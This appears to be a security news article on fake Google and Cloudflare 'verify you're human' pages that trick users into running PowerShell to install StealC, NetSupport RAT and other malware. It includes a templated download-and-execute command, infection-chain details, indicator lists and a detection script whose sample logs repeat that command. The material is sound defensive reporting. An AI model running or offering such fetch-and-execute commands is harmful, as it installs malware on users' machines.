GBHackers

Fake Google and Cloudflare Verification Pages Spread StealC, HijackLoader, and NetSupport Malware


Threat actors are currently exploiting sophisticated ClickFix social engineering campaigns that mimic Google and Cloudflare verification systems to distribute several high-impact malware families, including StealC, HijackLoader, NetSupport RAT, and newly identified loaders.

Recent threat intelligence research indicates that these campaigns have been active since late 2025, tricking users into manually executing malicious PowerShell commands. This effectively bypasses traditional security controls, allowing for a complete compromise of targeted systems.

The attack chains typically rely on fake “Verify you’re human” or “Manual Verification Required” pages that resemble Google reCAPTCHA, Google Meet prompts, and Cloudflare security checks.

These pages are hosted across repurposed domains, compromised websites, and Cloudflare Pages (.pages.dev) infrastructure. Victims are instructed to copy and execute commands such as:

```powershell
powershell -c "iex(irm '{IP}:{Port}/{Path}')"
```

Observed ports in these commands include 6600, 9900, 5506, 7895, 7493, 149, and 8442. Some campaigns also use the IClickFix framework to deliver payloads dynamically via clipboard injection.

“New sign-in with trusted token” ClickFix page (Source: Malwarebytes)

The infection process typically begins with obfuscated or plaintext PowerShell commands embedded in HTML templates, such as CustomCaptcha or the “SECURITY GATEWAY” framework.

This framework includes components such as GatewayRuntime, RemoteVault, and BeaconDispatcher. In certain variants, attackers implement an “approval gate” that allows real-time selection of payloads.

The “fix audio driver” Google Meet ClickFix lure (Source: Malwarebytes)

Additional lures include fake Google login alerts, QR code generators, and Google Meet “fix audio driver” prompts, with endpoints like /api/driver-clipboard.php returning OS-specific payloads, as reported by Malwarebytes.

Once executed, the PowerShell downloader drops a script named tmpXXXX.tmp.ps1 in the Temp directory. This script creates a directory called C:\ProgramData\Zooms, downloads second-stage payloads from Cloudflare R2 buckets or attacker-controlled IPs, and in some cases exfiltrates host data to endpoints such as http://{IP}/dl-callback. The infrastructure commonly includes ASN Dedik Services Limited, Cloudflare R2 storage, and characteristic “hehe” HTTP responses.
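As an added illustration (not code from the article or from Malwarebytes), the following Python hunting logic flags the iex(irm 'IP:Port/Path') command shape shown in the lure above together with the Temp-script and ProgramData\Zooms artifacts described in this paragraph when run over process-creation command lines. The log lines and IPs are constructed samples; commands whose port is outside the observed set are still flagged but marked as an unknown port.

```python
import re

# Ports seen in the campaign's iex(irm ...) commands, as listed in the article.
OBSERVED_PORTS = {6600, 9900, 5506, 7895, 7493, 149, 8442}

# Matches the lure's download-and-execute shape: iex(irm '<IP>:<port>/<path>').
# Tolerates optional spaces, an optional http:// scheme and either quote style.
IEX_IRM_RE = re.compile(
    r"iex\s*\(\s*irm\s*['\"](?:https?://)?"
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d{1,5})(?P<path>/[^'\"\s]*)?['\"]",
    re.IGNORECASE,
)

# Host artifacts the article describes for the second stage.
ARTIFACT_RES = {
    "temp_ps1": re.compile(r"\\Temp\\tmp[0-9A-Za-z]{4}\.tmp\.ps1\b", re.IGNORECASE),
    "zooms_dir": re.compile(r"\\ProgramData\\Zooms\b", re.IGNORECASE),
}

def inspect_command(cmdline):
    """Return a list of findings for one process command line (empty if nothing matched)."""
    findings = []
    m = IEX_IRM_RE.search(cmdline)
    if m:
        port = int(m.group("port"))
        findings.append({
            "rule": "clickfix_iex_irm",
            "ip": m.group("ip"),
            "port": port,
            "path": m.group("path") or "/",
            "known_port": port in OBSERVED_PORTS,
        })
    for name, rx in ARTIFACT_RES.items():
        if rx.search(cmdline):
            findings.append({"rule": name})
    return findings

def scan_logs(lines):
    """Map each log line index to its findings; lines with no findings are omitted."""
    return {i: f for i, line in enumerate(lines) if (f := inspect_command(line))}

# Constructed sample process-creation lines (hypothetical; not from the article).
SAMPLE_LOGS = [
    'powershell -c "iex(irm \'198.51.100.7:6600/verify\')"',
    'powershell -ep bypass -File C:\\Users\\u\\AppData\\Local\\Temp\\tmpA1B2.tmp.ps1',
    'cmd.exe /c mkdir C:\\ProgramData\\Zooms',
    'powershell -c "Get-ChildItem C:\\Windows"',
    "powershell -c \"IEX (IRM 'http://203.0.113.9:4444/x')\"",
]

if __name__ == "__main__":
    for i, findings in scan_logs(SAMPLE_LOGS).items():
        print(i, SAMPLE_LOGS[i][:60], findings)
```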

Payload delivery is highly modular, distributing malware via MSI installers, ZIP archives, and executable loaders. Observed payload mappings include libEGL.zip, which delivers a trojanized Electron-based Franz application with ResiLoader and StealC, Test.msi which deploys a Deno loader along with a PowerShell stealer, arworks.zip delivering Amatera Stealer, water-night.zip deploying Remus, and Setup.msi or Invintrum_first.msi, which installs NetSupport RAT.

Additional payloads include CastleLoader (traffic1.msi) and a Rust-based stealer (ibrowser.exe), both of which are often deployed via DLL hijacking.

“QR Code” ClickFix lure page (Source: Malwarebytes)

A notable infection chain involves the trojanized Franz app, which downloads a previously undocumented loader called ResiLoader. This loader, implemented as an obfuscated .NET NativeAOT DLL (msys-crypto-3.dll), uses bring-your-own-vulnerable-driver (BYOVD) techniques with the pcdhost.sys driver to disable over 140 AV/EDR processes.

It establishes persistence through the Run registry key and the directory C:\ProgramData\Google Update, performs UAC bypass using the ICMLuaUtil COM interface, and ultimately injects the StealC stealer into ServiceModelReg.exe via process hollowing. Communication with command-and-control infrastructure occurs through domains such as completstep[.]com.

The campaigns utilize an extensive infrastructure, including domains such as onegeekworld[.]com, antibotv3[.]com, generator-qrcode[.]online, and multiple .pages.dev subdomains, as well as Cloudflare R2 buckets such as pub-7080e0c20a0e47ca95a476869c532367.r2[.]dev.

Known payload distribution IPs include 151.240.151[.]126, 85.239.149[.]16, 93.152.224[.]29, and 135.181.171[.]40, while command-and-control servers include 146.19.248[.]120 (StealC), popularcard[.]shop (Rust stealer), and xzz[.]proxygrid[.]cc (Amatera). Associated malware hashes include 72907d0ca3258365838626f6a8d993a6 (ResiLoader), 0234E3188F2883A438B3F2BEAB7A78B2 (StealC), and eee416efcb1e33f220cdb4b05496a07a (NetSupport RAT).

This campaign underscores the growing effectiveness of user-assisted execution techniques, in which social engineering replaces exploit-based delivery. By leveraging trusted brands and requiring manual interaction, attackers significantly reduce detection rates while maintaining flexible, multi-payload distribution capabilities.

IoCs

| Type | Indicator / Value | Notes |
|---|---|---|
| Malware | ResiLoader DLL | New .NET NativeAOT loader used to deploy StealC and evade AV/EDR via the BYOVD driver pcdhost.sys |
| Hash | 72907d0ca3258365838626f6a8d993a6 | ResiLoader DLL sample from the ClickFix Google/Cloudflare campaign |
| Malware | StealC | Info-stealer delivered via process hollowing into ServiceModelReg.exe |
| Hash | 0234E3188F2883A438B3F2BEAB7A78B2 | StealC payload associated with this campaign |
| Malware | Remus Stealer | Distributed via water-night.zip from Cloudflare R2 / IP infrastructure |
| Hash | 6a9ac6b3fff7b695dbd4df6ff7f6c516 | Remus sample hash |
| Malware | Amatera Stealer | Delivered via arworks.zip from the Zooms folder chain |
| Hash | 206ce339febca0c3bcc850f42595fc63 | Amatera Stealer hash |
| Malware | NetSupport RAT | Installed via Setup.msi / Invintrum_first.msi |
| Hash | eee416efcb1e33f220cdb4b05496a07a | NetSupport sample hash |
| Malware | Rust Stealer | Dropped as ibrowser.exe, C2 at popularcard[.]shop |
| Hash | b8d53740024d126cb55f83854335a4ab | Rust stealer hash |
| Infra | onegeekworld[.]com, antibotv3[.]com, centralwildcats[.]com, regdev-google[.]com | Host fake Google/Cloudflare ClickFix verification pages |
| Infra | .pages[.]dev (p-floribunds, pg-altirade2, pg-cordivant-m6, g-luminence) | Cloudflare Pages used for obfuscated SECURITY GATEWAY lures |
| Infra | generator-qrcode[.]online | Fake “My QR Generator” ClickFix service demanding PowerShell verification |
| Infra | pub-7080e0c20a0e47ca95a476869c532367.r2[.]dev and other pub-.r2[.]dev buckets | Cloudflare R2 buckets used for payload ZIP/MSI hosting |
| Infra | completstep[.]com | Loader C2 used by the trojanized Franz/ResiLoader chain |
| Infra | 151.240.151[.]126, 85.239.149[.]16, 93.152.224[.]29, 135.181.171[.]40 | Payload distribution IPs used in powershell iex(irm 'IP:Port/Path') patterns |
| Infra | 146.19.248[.]120 | StealC C2 in this infrastructure cluster |

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
